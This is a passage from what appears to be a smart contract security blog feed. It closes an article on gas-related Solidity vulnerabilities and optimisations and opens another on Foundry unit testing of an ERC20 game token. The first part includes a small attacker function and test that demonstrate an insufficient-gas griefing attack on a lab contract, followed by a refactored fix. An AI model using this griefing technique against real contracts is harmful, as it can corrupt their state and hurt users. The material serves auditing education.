While this version no longer triggers an actual `OutOfGas` error, it still serves an important purpose: it shows **how expensive the function is even with relatively few entries**. The gas report reveals that `amplifySpirits()` consumes over 326,000 gas in this small-scale scenario—making it clear how quickly the function becomes unsustainable as the dataset grows.

## Insufficient Gas Griefing

**Vulnerability**: Failing to check the result of a low-level call allows an attacker to provide insufficient gas to an external call, causing it to fail silently while the contract continues execution under the false assumption that everything succeeded.

The `invokeOracle()` function includes the following logic:

```solidity
(bool success, ) = oracle.call(
    abi.encodeWithSignature(&quot;recordInvocation()&quot;)
);

if (success) {
    corruptionIndex -= 1;
}

```

If the call to the oracle fails (for example, due to insufficient gas), `success` will be `false`. However, the function does not revert or perform any other validation—it simply skips the rollback of the `corruptionIndex`, which was incremented earlier in the function.

In `testInsufficientGasInvocation()`, the attacker calls `invokeOracle()` with only 50,000 gas—enough to reach the external call, but not enough for `recordInvocation()` to complete. The oracle’s function includes a state write, which fails due to low gas. The call fails silently, but the `corruptionIndex` remains incremented.

```solidity
function testInsufficientGasInvocation() public {
        vm.deal(address(grimoire), 10 ether);

        attacker.performGriefingInvocation(address(grimoire));

        uint256 index = grimoire.corruptionIndex();
        console.log(&quot;Corruption index after failed invocation:&quot;, index);
        assertEq(index, 1);
    }

```

```solidity
function performGriefingInvocation(address grimoireAddress) public {
        bytes memory incantation = abi.encodeWithSignature(&quot;invokeOracle()&quot;);
        grimoireAddress.call{gas: 50000}(incantation);
    }

```

![](/content/images/2025/03/image-9.png)

Test trace

In this test, `corruptionIndex` is used as a simple counter to demonstrate the issue. But in real-world systems, this could easily be something more critical: a nonce for a replay-protected signature, a counter in a DAO voting module, or a usage flag in a multisig wallet. Any of these could be permanently desynchronized by the same technique.

This is my favorite gas-related vulnerability in Web3 because it exposes how gas is not just a cost—it&apos;s a constraint. If developers don’t treat gas failures as first-class failures, attackers will use that gap to corrupt contract logic.

# Practical Tips for Writing Gas-Efficient Smart Contracts

As pentesters, our job goes beyond finding vulnerabilities—we’re also expected to provide **actionable insights** that help teams harden and optimize their contracts. Gas usage is one of the most overlooked areas in early-stage smart contract development, and inefficient code can quickly become a bottleneck in production.

During an audit, it&apos;s worth paying attention to patterns or decisions that increase gas costs unnecessarily. Recommending improvements in gas efficiency not only helps your client reduce user costs—it can also **prevent logic failures** under heavy load, and improve the scalability and long-term maintainability of the protocol.

Below is a collection of things you should look for when reviewing contracts, along with best practices that you can suggest to clients during or after the audit. Many of them apply directly to the GrimoireOfEchoes example we&apos;ve seen.

## Minimize Storage Writes

Storage operations are among the most expensive things you can do on-chain. Every time you update a `mapping`, assign a new value to a `uint`, or change the state of a contract variable, you’re writing to persistent storage—which costs significantly more gas than reading from it.  
Avoid unnecessary writes. For instance, don’t overwrite a value if it hasn’t changed, and don’t reset a variable unless you absolutely need to.

&lt;details&gt;
&lt;summary&gt;Instead of blindly writing:&lt;/summary&gt;

```solidity
manaReservoir[msg.sender] = 0;

```
&lt;/details&gt;


Check if it’s already zero, or skip the write under certain conditions. These savings accumulate fast in high-traffic contracts.

## Use constant and immutable Whenever Possible

If a variable doesn’t change after deployment, mark it as `constant` or `immutable`. This tells the compiler that the value is fixed, allowing it to pack and optimize the bytecode accordingly.

-   `constant` is for values known at compile time (e.g., a fee rate).
-   `immutable` is for values set once in the constructor (e.g., an oracle address).

  
Reading from `constant` or `immutable` variables is **cheaper** than accessing standard storage variables.

```solidity
uint256 public constant forbiddenTithe = 100;

```

Much better than a normal state variable when the value never changes.

## Avoid Unbounded Loops

We covered this earlier in the context of vulnerabilities, but it’s worth repeating as a general best practice. Unbounded `for` loops over user-controlled arrays are dangerous—not just for DoS potential, but also because they consume a **lot** of gas quickly.

**What to do instead:**

-   Enforce a maximum input length.
-   Process data in **batches** or over multiple transactions.
-   Use events for logging rather than updating storage inside the loop, when possible.

## Use `view` and `pure` Modifiers Appropriately

Functions that don’t modify state should be explicitly marked with `view` (reads state) or `pure` (reads neither). This isn’t just about semantics—it affects how the function is used.

Calling a `view` or `pure` function from off-chain (e.g., a frontend or script) doesn’t cost gas. But if the function isn’t marked, it might appear to require a transaction when it doesn’t.

```solidity
function checkMana(address user) external view returns (uint256) {
    return manaReservoir[user];
}

```

## Pack Storage Variables When Possible

Solidity stores data in 32-byte slots. If you declare multiple variables of smaller types (e.g., `uint8`, `bool`, `address`) together, they can often fit in a single slot, reducing gas costs.  
Proper packing reduces the number of storage slots used, which means cheaper writes and cheaper deployments.

## Favor uint256 for Math Over Smaller Types

This one’s a bit counterintuitive: while `uint8` or `uint16` may seem smaller and more efficient, using `uint256` in most cases is better—especially in the EVM, which is natively 256-bit. Smaller types often require extra conversion logic (type casting) or padding, which **increases** gas costs in many operations.

## Don’t Overuse Events for Internal State Tracking

Events are great for off-chain indexing and logging, but they don’t modify on-chain state. If you’re using events as a way to track something critical (e.g., who has invoked a spell), that logic should **live on-chain**, not only in emitted logs.

Relying solely on events for logic validation can lead to inconsistencies, especially if a function fails after the event is emitted.

Use events for transparency and analytics—not as a source of truth.

## Consider Using unchecked for Safe Math in Trusted Contexts

Since Solidity 0.8.0, arithmetic operations include overflow checks by default. While this improves safety, it adds gas overhead. In trusted internal logic (e.g., `for` loop counters), you can use `unchecked` blocks to save gas safely.

```solidity
for (uint256 i = 0; i &lt; n; ) {
    // do stuff

    unchecked {
        i++;
    }
}

```

It avoids unnecessary checks in contexts where overflow is not a concern (e.g., incrementing a loop index up to a known bound).

# Final Refactored Contract

Below you can see how the previously vulnerable contract looks once optimized to reduce gas consumption and eliminate the issues discussed earlier.

&lt;details&gt;
&lt;summary&gt;Refractored Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract GrimoireOfEchoes {
    mapping(address =&gt; uint256) public manaReservoir;
    uint256 public corruptionIndex;
    address public immutable oracle;
    uint256 public constant FORBIDDEN_TITHE = 100;

    error NoEssenceBound();
    error RitualDisrupted();
    error OnlyContractsMayInvoke();

    event SpellBackfired(address target, bytes incantation);

    constructor(address _oracle) {
        oracle = _oracle;
    }

    function channelMana() external payable {
        manaReservoir[msg.sender] += msg.value;
    }

    function withdrawEssence() external {
        uint256 essence = manaReservoir[msg.sender];
        if (essence == 0) revert NoEssenceBound();

        manaReservoir[msg.sender] = 0;

        (bool success, ) = payable(msg.sender).call{value: essence}(&quot;&quot;);
        if (!success) revert RitualDisrupted();
    }

    function amplifySpirits(address[] calldata spirits) external {
        uint256 len = spirits.length;
        for (uint256 i = 0; i &lt; len;) {
            manaReservoir[spirits[i]] = manaReservoir[spirits[i]] * 2;
            unchecked { i++; }
        }
    }

    function invokeOracle() external {
        if (msg.sender == tx.origin) revert OnlyContractsMayInvoke();

        (bool success, ) = oracle.call(
            abi.encodeWithSignature(&quot;recordInvocation()&quot;)
        );

        if (success) {
            unchecked { corruptionIndex += 1; }
        } else {
            emit SpellBackfired(oracle, abi.encodeWithSignature(&quot;recordInvocation()&quot;));
        }
    }
}

contract OracleOfWhispers {
    mapping(address =&gt; bool) public invoked;
    event InvocationRecorded(address caller);

    error AlreadyInvoked();

    function recordInvocation() external {
        if (invoked[msg.sender]) revert AlreadyInvoked();

        invoked[msg.sender] = true;
        emit InvocationRecorded(msg.sender);
    }
}

```
&lt;/details&gt;


-   **Switched to pull-based ETH withdrawal (`withdrawEssence`)**  
    The original function used a 2300 gas `call`, which is risky for contract receivers. We now use a pull pattern: users call `withdrawEssence()` themselves, and gas forwarding is not artificially restricted.
-   **Replaced state variables with `constant` and `immutable`**`FORBIDDEN_TITHE` is now `constant`, reducing storage costs.`oracle` is now `immutable`, since it’s only set once in the constructor.
-   **Introduced custom errors for cheaper and cleaner reverts**  
    Instead of using string-based `require()`, we defined custom errors. This lowers gas usage and improves clarity when reading the code.
-   **Deferred state change after external call (`invokeOracle`)**  
    We moved the increment of `corruptionIndex` to only occur **after** verifying that the call to the oracle succeeded—preventing silent state corruption.
-   **Loop optimizations in `amplifySpirits()`**Cached the array length in a local variable to save gas.Used `unchecked` for the loop index increment, since overflow is not possible within a bounded loop.
-   **Function naming made more expressive (`withdrawEssence`)**  
    The previous name `releaseEssence` implied a push-based model. `withdrawEssence` better reflects the new pull-based pattern.
-   **Failure logging (`SpellBackfired` event)**  
    If the oracle call fails, we emit an event to make it observable off-chain, which aids in debugging and monitoring.

# Conclusions

Gas is more than just a fee—it’s a constraint that directly impacts how contracts behave, scale, and fail.

Throughout this article, we’ve looked at how poor gas management can lead to silent logic corruption, blocked withdrawals, and denial-of-service risks. But we’ve also seen how thoughtful design choices—like switching to pull-based transfers, bounding loops, and using efficient patterns—can prevent these issues entirely.

When auditing smart contracts, spotting vulnerabilities is only half the job. The real value comes from understanding **why** they happen and how to **reshape the code** to make it safer and more efficient.

Use gas reports to validate your assumptions, study how code behaves under pressure, and don&apos;t just look for exploits—look for opportunities to improve.

Smart contracts are, in the end, systems running under strict limits. And a well-audited system isn’t just secure—it’s built to _endure_.</content:encoded><author>Ruben Santos</author></item><item><title>Strengthening Smart Contracts: Unit Testing, Fuzzing, and Invariant Testing with Foundry</title><link>https://www.kayssel.com/post/web3-15</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-15</guid><description>We explore unit testing, fuzzing, and invariant testing in smart contracts to detect vulnerabilities and enhance security before deployment, using Foundry for automated and effective testing.</description><pubDate>Sun, 16 Mar 2025 11:35:11 GMT</pubDate><content:encoded>Over the past few weeks, I’ve been exploring different testing methodologies for smart contracts, and in this chapter, we’ll go through three key techniques to ensure contract reliability and security:

-   **Unit Testing** – Verifies that individual functions return expected results under controlled conditions.
-   **Fuzzing** – Generates random, extreme, or unexpected inputs to uncover vulnerabilities.
-   **Invariant Testing** – Ensures that fundamental rules (such as token supply consistency) always hold, regardless of transaction order or volume.

Testing is the process of verifying that a program behaves as expected across different scenarios. In smart contracts, this is especially important since once deployed, contracts cannot be modified, meaning that any bug or exploit could lead to financial loss, security breaches, or permanently locked funds. Good testing goes beyond checking if a function returns the right value; it also considers edge cases, unexpected inputs, and adversarial conditions to identify potential failures before they reach production.

We’ll work through various examples to demonstrate how each of these techniques can help detect and prevent issues before deployment. For today’s chapter, we’ll focus exclusively on Foundry with its basic configuration, though Foundry provides a wide range of advanced testing options that we’ll explore in future chapters.

By the end of this chapter, you’ll have a solid understanding of how these testing techniques apply to smart contracts, with practical examples of how they help identify and fix vulnerabilities before deployment.

Let’s dive in!

# DesertCoin Smart Contract

Now that we understand what testing is and why it’s crucial, let’s look at an example using a modified version of the smart contract we built in the previous article. This time, our ERC20 token will serve as an in-game currency, allowing players to buy items, trade with other users, and even stake their tokens for rewards.

&lt;details&gt;
&lt;summary&gt;DesertCoin&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import &quot;@openzeppelin/contracts/token/ERC20/ERC20.sol&quot;;
import &quot;@openzeppelin/contracts/access/Ownable.sol&quot;;
import &quot;@openzeppelin/contracts/utils/Pausable.sol&quot;;

contract DesertCoin is ERC20, Ownable, Pausable {
    uint256 public faucetAmount = 1000 * (10 ** decimals());
    mapping(address =&gt; uint256) public lastFaucetClaim;
    mapping(uint256 =&gt; uint256) public itemPrices;
    mapping(address =&gt; mapping(uint256 =&gt; bool)) public purchasedItems;
    mapping(address =&gt; uint256) public stakedBalance;

    event ItemPurchased(address indexed buyer, uint256 indexed itemId);
    event ItemPriceSet(uint256 indexed itemId, uint256 price);
    event TokensStaked(address indexed user, uint256 amount);
    event TokensUnstaked(address indexed user, uint256 amount);

    constructor(uint256 initialSupply) ERC20(&quot;DesertCoin&quot;, &quot;DSC&quot;) Ownable(msg.sender) {
        _mint(msg.sender, initialSupply);
    }

    /**  Faucet to receive tokens */
    function claimFaucet() public {
        require(block.timestamp &gt;= lastFaucetClaim[msg.sender] + 1 days, &quot;Wait 24h to claim again&quot;);
        _mint(msg.sender, faucetAmount);
        lastFaucetClaim[msg.sender] = block.timestamp;
    }

    /**  Set price for an in-game item (Only Owner) */
    function setItemPrice(uint256 itemId, uint256 price) public onlyOwner {
        require(price &gt; 0, &quot;Price must be greater than zero&quot;);
        itemPrices[itemId] = price;
        emit ItemPriceSet(itemId, price);
    }

    /**  Buy game items */
    function buyItem(uint256 itemId) public {
        require(itemPrices[itemId] &gt; 0, &quot;Item not for sale&quot;);
        require(balanceOf(msg.sender) &gt;= itemPrices[itemId], &quot;Not enough DSC&quot;);

        _burn(msg.sender, itemPrices[itemId]);
        purchasedItems[msg.sender][itemId] = true;
        emit ItemPurchased(msg.sender, itemId);
    }

    /**  Trade tokens with another player */
    function trade(address to, uint256 amount) public {
        require(balanceOf(msg.sender) &gt;= amount, &quot;Insufficient balance&quot;);
        require(to != address(0), &quot;Invalid address&quot;);

        _transfer(msg.sender, to, amount);
    }

    /**  Block the tokens for staking */
    function stake(uint256 amount) public {
        require(balanceOf(msg.sender) &gt;= amount, &quot;Insufficient DSC&quot;);

        _burn(msg.sender, amount);
        stakedBalance[msg.sender] += amount;
        emit TokensStaked(msg.sender, amount);
    }

    function unstake(uint256 amount) public {
        require(stakedBalance[msg.sender] &gt;= amount, &quot;Not enough staked&quot;);

        _mint(msg.sender, amount);
        stakedBalance[msg.sender] -= amount;
        emit TokensUnstaked(msg.sender, amount);
    }

    /** ️ Pause the contract */
    function pause() public onlyOwner {
        _pause();
    }

    function unpause() public onlyOwner {
        _unpause();
    }

    /**  Prevent transfers when paused */
    function _update(address from, address to, uint256 amount) internal virtual override {
        require(!paused(), &quot;ERC20Pausable: token transfer while paused&quot;);
        super._update(from, to, amount);
    }
}

```
&lt;/details&gt;


At the core of the contract, we inherit from OpenZeppelin’s **ERC20**, **Ownable**, and **Pausable** contracts:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import &quot;@openzeppelin/contracts/token/ERC20/ERC20.sol&quot;;
import &quot;@openzeppelin/contracts/access/Ownable.sol&quot;;
import &quot;@openzeppelin/contracts/utils/Pausable.sol&quot;;

```

This not only simplifies the implementation but also ensures that our token follows the ERC20 standard, includes ownership-based restrictions, and provides a built-in security mechanism that allows us to pause operations if needed.

To manage different aspects of the game, the contract includes several **global variables**:

```solidity
uint256 public faucetAmount = 1000 * (10 ** decimals());
    mapping(address =&gt; uint256) public lastFaucetClaim;
    mapping(uint256 =&gt; uint256) public itemPrices;
    mapping(address =&gt; mapping(uint256 =&gt; bool)) public purchasedItems;
    mapping(address =&gt; uint256) public stakedBalance;

```

These variables help track faucet claims (ensuring users can only claim tokens once per day), store item prices, register which items have been purchased by each player, and maintain a record of staked balances.

We also define key **events** to log important actions, such as when an item is purchased, a new item price is set, or tokens are staked or unstaked:

```solidity
    event ItemPurchased(address indexed buyer, uint256 indexed itemId);
    event ItemPriceSet(uint256 indexed itemId, uint256 price);
    event TokensStaked(address indexed user, uint256 amount);
    event TokensUnstaked(address indexed user, uint256 amount);

```

These events play a crucial role in tracking blockchain activity, as they allow external applications and users to monitor contract interactions.

The **constructor** initializes the token’s name, symbol, and initial supply while assigning ownership:

```solidity
constructor(uint256 initialSupply) ERC20(&quot;DesertCoin&quot;, &quot;DSC&quot;) Ownable(msg.sender) {
        _mint(msg.sender, initialSupply);
    }

```

From here, we introduce several key functions. The first is `claimFaucet`, which allows users to receive free tokens every 24 hours:

```solidity
    /**  Faucet to receive tokens */
    function claimFaucet() public {
        require(block.timestamp &gt;= lastFaucetClaim[msg.sender] + 1 days, &quot;Wait 24h to claim again&quot;);
        _mint(msg.sender, faucetAmount);
        lastFaucetClaim[msg.sender] = block.timestamp;
    }

```

This ensures that players can periodically receive small amounts of **DesertCoin** without draining the total supply.

Next, we have a function that lets the **owner** set the price of in-game items. This prevents unauthorized modifications that could disrupt the economy:

```solidity
/**  Set price for an in-game item (Only Owner) */
    function setItemPrice(uint256 itemId, uint256 price) public onlyOwner {
        require(price &gt; 0, &quot;Price must be greater than zero&quot;);
        itemPrices[itemId] = price;
        emit ItemPriceSet(itemId, price);
    }

```

The `buyItem` function allows players to **purchase in-game items** using **DSC tokens**. When an item is bought, the corresponding amount of tokens is burned from the buyer’s balance, and the purchase is registered:

```solidity
    /**  Buy game items */
    function buyItem(uint256 itemId) public {
        require(itemPrices[itemId] &gt; 0, &quot;Item not for sale&quot;);
        require(balanceOf(msg.sender) &gt;= itemPrices[itemId], &quot;Not enough DSC&quot;);

        _burn(msg.sender, itemPrices[itemId]);
        purchasedItems[msg.sender][itemId] = true;
        emit ItemPurchased(msg.sender, itemId);
    }


```

We also introduce a **trading mechanism** that allows players to transfer tokens among themselves:

```solidity
function trade(address to, uint256 amount) public {
    require(balanceOf(msg.sender) &gt;= amount, &quot;Insufficient balance&quot;);
    require(to != address(0), &quot;Invalid address&quot;);

    _transfer(msg.sender, to, amount);
}

```

Next, we implement a **staking system** where players can stake their tokens. Staked tokens are burned, and the balance is recorded:

```solidity
  /**  Block the tokens for staking */
    function stake(uint256 amount) public {
        require(balanceOf(msg.sender) &gt;= amount, &quot;Insufficient DSC&quot;);

        _burn(msg.sender, amount);
        stakedBalance[msg.sender] += amount;
        emit TokensStaked(msg.sender, amount);
    }

```

Users can **unstake** their tokens at any time, which mints them back into circulation:

```solidity

    function unstake(uint256 amount) public {
        require(stakedBalance[msg.sender] &gt;= amount, &quot;Not enough staked&quot;);

        _mint(msg.sender, amount);
        stakedBalance[msg.sender] -= amount;
        emit TokensUnstaked(msg.sender, amount);
    }

```

For **security reasons**, we also introduce **pause and unpause functions**, allowing the contract owner to disable transfers and other interactions in case of emergency:

```solidity
    /** ️ Pause the contract */
    function pause() public onlyOwner {
        _pause();
    }

    function unpause() public onlyOwner {
        _unpause();
    }

```

Finally, we override the `_update` function to prevent token transfers when the contract is paused:

```solidity
/**  Prevent transfers when paused */
    function _update(address from, address to, uint256 amount) internal virtual override {
        require(!paused(), &quot;ERC20Pausable: token transfer while paused&quot;);
        super._update(from, to, amount);
    }

```

# Verifying Core Functionality with Unit Tests

In previous articles, we’ve explored how to use **Foundry** for testing, emulating exploits, and simulating different attack scenarios. By now, you should be comfortable with writing and running tests in Foundry, but today, we’re shifting our focus to **unit testing**—a fundamental part of any **smart contract audit**.

When auditing a project, developers typically provide a **suite of unit tests** alongside the smart contract. These tests serve as the first line of defense against bugs and logic errors, ensuring that the contract behaves as expected under normal conditions. However, as auditors, we can’t just rely on the tests they provide. Unit tests are usually written to confirm that functions return the correct values, but they don’t always explore edge cases, adversarial conditions, or the unintended ways a contract could break. That’s where **fuzzing and invariant testing** come in—but we’ll get to those later.

&lt;details&gt;
&lt;summary&gt;Unit Testing of DesertCoin&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import &quot;forge-std/Test.sol&quot;;
import &quot;../src/DesertCoin.sol&quot;;

contract DesertCoinTest is Test {
    DesertCoin desertCoin;
    address owner = address(1);
    address user1 = address(2);
    address user2 = address(3);

    uint256 initialSupply = 1_000_000 ether;

    function setUp() public {
        vm.startPrank(owner); // Set the owner for testing
        desertCoin = new DesertCoin(initialSupply);
        desertCoin.transfer(user1, 1000 ether); // Give some tokens to user1
        vm.stopPrank();
    }

    /**  1. Faucet */
    function testClaimFaucet() public {
        vm.warp(block.timestamp + 1 days); // Simulate 24h passing

        vm.prank(user1);
        desertCoin.claimFaucet();

        assertEq(
            desertCoin.balanceOf(user1),
            1000 ether + desertCoin.faucetAmount()
        );
    }

    function testFailClaimFaucetTwice() public {
        vm.prank(user1);
        desertCoin.claimFaucet();

        vm.prank(user1);
        desertCoin.claimFaucet(); // Should fail because only once every 24h
    }

    /**  2. Marketplace */
    function testSetItemPrice() public {
        vm.prank(owner);
        desertCoin.setItemPrice(1, 500 ether);

        assertEq(desertCoin.itemPrices(1), 500 ether);
    }

    function testFailSetItemPriceByNonOwner() public {
        vm.prank(user1);
        desertCoin.setItemPrice(1, 500 ether); // Should fail since user1 is not the owner
    }

    function testBuyItem() public {
        vm.prank(owner);
        desertCoin.setItemPrice(1, 500 ether);

        vm.prank(user1);
        desertCoin.buyItem(1);

        assertTrue(desertCoin.purchasedItems(user1, 1));
        assertEq(desertCoin.balanceOf(user1), 500 ether);
    }

    function testFailBuyItemInsufficientFunds() public {
        vm.prank(owner);
        desertCoin.setItemPrice(1, 2000 ether); // More than user&apos;s balance

        vm.prank(user1);
        desertCoin.buyItem(1); // Should fail
    }

    /**  3. Transfers */
    function testTrade() public {
        vm.prank(user1);
        desertCoin.trade(user2, 500 ether);

        assertEq(desertCoin.balanceOf(user1), 500 ether);
        assertEq(desertCoin.balanceOf(user2), 500 ether);
    }

    function testFailTradeInsufficientBalance() public {
        vm.prank(user1);
        desertCoin.trade(user2, 2000 ether); // Should fail (not enough balance)
    }

    function testFailTradeWhilePaused() public {
        vm.prank(owner);
        desertCoin.pause();

        vm.prank(user1);
        desertCoin.trade(user2, 100 ether); // Should fail due to pause
    }

    function testTradeAfterUnpause() public {
        vm.prank(owner);
        desertCoin.pause();

        vm.prank(owner);
        desertCoin.unpause();

        vm.prank(user1);
        desertCoin.trade(user2, 100 ether); // Should succeed
    }

    /** 4. Staking */
    function testStake() public {
        vm.prank(user1);
        desertCoin.stake(500 ether);

        assertEq(desertCoin.stakedBalance(user1), 500 ether);
        assertEq(desertCoin.balanceOf(user1), 500 ether);
    }

    function testFailStakeInsufficientFunds() public {
        vm.prank(user1);
        desertCoin.stake(2000 ether); // Should fail
    }

    function testUnstake() public {
        vm.prank(user1);
        desertCoin.stake(500 ether);

        vm.prank(user1);
        desertCoin.unstake(500 ether);

        assertEq(desertCoin.stakedBalance(user1), 0);
        assertEq(desertCoin.balanceOf(user1), 1000 ether);
    }

    function testFailUnstakeMoreThanStaked() public {
        vm.prank(user1);
        desertCoin.stake(500 ether);

        vm.prank(user1);
        desertCoin.unstake(1000 ether); // Should fail
    }

    /** 5. Pausing */
    function testPauseAndUnpause() public {
        vm.prank(owner);
        desertCoin.pause();

        vm.prank(owner);
        vm.expectRevert(&quot;ERC20Pausable: token transfer while paused&quot;);
        desertCoin.transfer(user1, 100 ether); // Should fail

        vm.prank(owner);
        desertCoin.unpause();

        vm.prank(owner);
        desertCoin.transfer(user1, 100 ether); // Should succeed
    }
}

```
&lt;/details&gt;


For now, let’s analyze a **unit test suite** for **DesertCoin**, written in **Foundry**. This will help us understand what developers typically test, what gaps might exist, and how we can extend our testing methodology beyond the basics.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import &quot;forge-std/Test.sol&quot;;
import &quot;../src/DesertCoin.sol&quot;;

contract DesertCoinTest is Test {
    DesertCoin desertCoin;
    address owner = address(1);
    address user1 = address(2);
    address user2 = address(3);

    uint256 initialSupply = 1_000_000 ether;

    function setUp() public {
        vm.startPrank(owner);
        desertCoin = new DesertCoin(initialSupply);
        desertCoin.transfer(user1, 1000 ether);
        vm.stopPrank();
    }

```

The `setUp` function is executed before each test, ensuring a clean and predictable environment. It **deploys the contract**, assigns **initial tokens** to `user1`, and sets `owner` as the privileged address. This setup mirrors the kind of **controlled conditions** developers use when writing unit tests—they aim to verify that the contract performs as expected under normal circumstances.

### **Testing the Faucet System**

One of the first things tested is the **faucet function**, which allows users to claim tokens every 24 hours.

```solidity
function testClaimFaucet() public {
    vm.warp(block.timestamp + 1 days);

    vm.prank(user1);
    desertCoin.claimFaucet();

    assertEq(desertCoin.balanceOf(user1), 1000 ether + desertCoin.faucetAmount());
}

```

Here, `vm.warp` is used to simulate time passing, ensuring that the user can successfully claim tokens after the cooldown period. A common mistake in contracts with time-based restrictions is failing to properly enforce delays, so verifying this behavior is crucial.

The following test checks that users can’t claim the faucet reward twice within 24 hours:

```solidity
function testFailClaimFaucetTwice() public {
    vm.prank(user1);
    desertCoin.claimFaucet();

    vm.prank(user1);
    desertCoin.claimFaucet(); // Should fail
}

```

This confirms that the cooldown period is correctly enforced, preventing users from draining the faucet balance.

### **Testing the Marketplace**

The next set of tests focuses on the **marketplace functionality**, ensuring that only the **contract owner** can set item prices:

```solidity
function testSetItemPrice() public {
    vm.prank(owner);
    desertCoin.setItemPrice(1, 500 ether);

    assertEq(desertCoin.itemPrices(1), 500 ether);
}

```

If a regular user attempts to set an item price, the transaction should **fail**:

```solidity
function testFailSetItemPriceByNonOwner() public {
    vm.prank(user1);
    desertCoin.setItemPrice(1, 500 ether); // Should fail
}

```

Once prices are set, users should be able to purchase items:

```solidity
function testBuyItem() public {
    vm.prank(owner);
    desertCoin.setItemPrice(1, 500 ether);

    vm.prank(user1);
    desertCoin.buyItem(1);

    assertTrue(desertCoin.purchasedItems(user1, 1));
    assertEq(desertCoin.balanceOf(user1), 500 ether);
}

```

However, **buying an item without enough balance** should not be possible:

```solidity
function testFailBuyItemInsufficientFunds() public {
    vm.prank(owner);
    desertCoin.setItemPrice(1, 2000 ether);

    vm.prank(user1);
    desertCoin.buyItem(1); // Should fail
}

```

### **Testing Transfers**

The `trade` function in **DesertCoin** allows users to transfer tokens to one another. This is a basic ERC20 feature, but since we’ve modified the contract to include staking, pausing, and other mechanisms, it’s important to verify that transfers function correctly in all conditions.

First, let’s check that a valid transfer between two users works as expected:

```solidity
function testTrade() public {
    vm.prank(user1);
    desertCoin.trade(user2, 500 ether);

    assertEq(desertCoin.balanceOf(user1), 500 ether);
    assertEq(desertCoin.balanceOf(user2), 500 ether);
}

```

This confirms that `user1` can successfully send 500 DSC tokens to `user2`, reducing `user1`’s balance and increasing `user2`’s accordingly.

However, if a user attempts to transfer more tokens than they own, the transaction should fail:

```solidity
function testFailTradeInsufficientBalance() public {
    vm.prank(user1);
    desertCoin.trade(user2, 2000 ether); // Should fail (not enough balance)
}

```

This ensures that balance checks are enforced, preventing users from sending tokens they don’t have.

One crucial edge case to test is how the pause function affects transfers. Since DesertCoin implements `Pausable`, we need to verify that transactions are blocked when the contract is paused:

```solidity
function testFailTradeWhilePaused() public {
    vm.prank(owner);
    desertCoin.pause();

    vm.prank(user1);
    desertCoin.trade(user2, 100 ether); // Should fail due to pause
}

```

Finally, we check that after unpausing, transfers resume as expected:

```solidity
function testTradeAfterUnpause() public {
    vm.prank(owner);
    desertCoin.pause();
    
    vm.prank(owner);
    desertCoin.unpause();

    vm.prank(user1);
    desertCoin.trade(user2, 100 ether); // Should succeed
}

```

### **Testing Staking and Unstaking**

Next, we have staking and unstaking, where users can lock up tokens in the contract.

```solidity
function testStake() public {
    vm.prank(user1);
    desertCoin.stake(500 ether);

    assertEq(desertCoin.stakedBalance(user1), 500 ether);
    assertEq(desertCoin.balanceOf(user1), 500 ether);
}

```

This verifies that staked tokens are deducted from the user’s balance and correctly reflected in the `stakedBalance` mapping.

If a user tries to stake more tokens than they have, the function should revert:

```solidity
function testFailStakeInsufficientFunds() public {
    vm.prank(user1);
    desertCoin.stake(2000 ether); // Should fail
}

```

Unstaking should restore the user’s balance:

```solidity
function testUnstake() public {
    vm.prank(user1);
    desertCoin.stake(500 ether);

    vm.prank(user1);
    desertCoin.unstake(500 ether);

    assertEq(desertCoin.stakedBalance(user1), 0);
    assertEq(desertCoin.balanceOf(user1), 1000 ether);
}

```

If a user tries to unstake more than they have, the function should fail:

```solidity
function testFailUnstakeMoreThanStaked() public {
    vm.prank(user1);
    desertCoin.stake(500 ether);

    vm.prank(user1);
    desertCoin.unstake(1000 ether); // Should fail
}

```

### **Testing the Pause Mechanism**

Finally, we test the pause and unpause functions, ensuring that transfers are blocked while paused.

```solidity
function testPauseAndUnpause() public {
    vm.prank(owner);
    desertCoin.pause();

    vm.prank(owner);
    vm.expectRevert(&quot;ERC20Pausable: token transfer while paused&quot;);
    desertCoin.transfer(user1, 100 ether); // Should fail

    vm.prank(owner);
    desertCoin.unpause();

    vm.prank(owner);
    desertCoin.transfer(user1, 100 ether); // Should succeed
}

```

This test ensures that the pause mechanism works as intended, preventing transfers while active and resuming them once disabled.

### **Running the Tests with Foundry**

Once our test suite is written, we can run it using Foundry’s `forge test` command. Running these tests is a crucial step in auditing a smart contract, as it allows us to quickly verify that all unit tests pass before diving into more advanced testing techniques like fuzzing and invariant testing.

To execute the tests for DesertCoin, navigate to the root directory of your project and run:

```solidity
forge test 

```

Upon execution, Foundry will compile the contracts, run all the test cases, and display a summary of the results. Here’s an example output:

```solidity
[⠒] Compiling...
[⠊] Compiling 2 files with Solc 0.8.28
[⠒] Solc 0.8.28 finished in 776.29ms
Compiler run successful!

Ran 15 tests for test/DesertCoin.t.sol:DesertCoinTest
[PASS] testBuyItem() (gas: 80049)
[PASS] testClaimFaucet() (gas: 52558)
[PASS] testFailBuyItemInsufficientFunds() (gas: 42315)
[PASS] testFailClaimFaucetTwice() (gas: 12881)
[PASS] testFailSetItemPriceByNonOwner() (gas: 12763)
[PASS] testFailStakeInsufficientFunds() (gas: 12835)
[PASS] testFailTradeInsufficientBalance() (gas: 15086)
[PASS] testFailTradeWhilePaused() (gas: 25084)
[PASS] testFailUnstakeMoreThanStaked() (gas: 50519)
[PASS] testPauseAndUnpause() (gas: 36459)
[PASS] testSetItemPrice() (gas: 37767)
[PASS] testStake() (gas: 52111)
[PASS] testTrade() (gas: 48063)
[PASS] testTradeAfterUnpause() (gas: 52444)
[PASS] testUnstake() (gas: 42420)
Suite result: ok. 15 passed; 0 failed; 0 skipped; finished in 1.20ms (1.43ms CPU time)

Ran 1 test suite in 5.71ms (1.20ms CPU time): 15 tests passed, 0 failed, 0 skipped (15 total tests)

```

Each line in the output provides valuable insights:

-   `[PASS]` indicates a **successful** test.
-   The **gas usage** for each function is displayed, which is useful for optimizing contract efficiency.
-   The summary at the end confirms that **all tests passed, none failed, and none were skipped**.
-   The execution time is also displayed, showing how quickly the tests ran.

## How to Identify and Address Untested Code

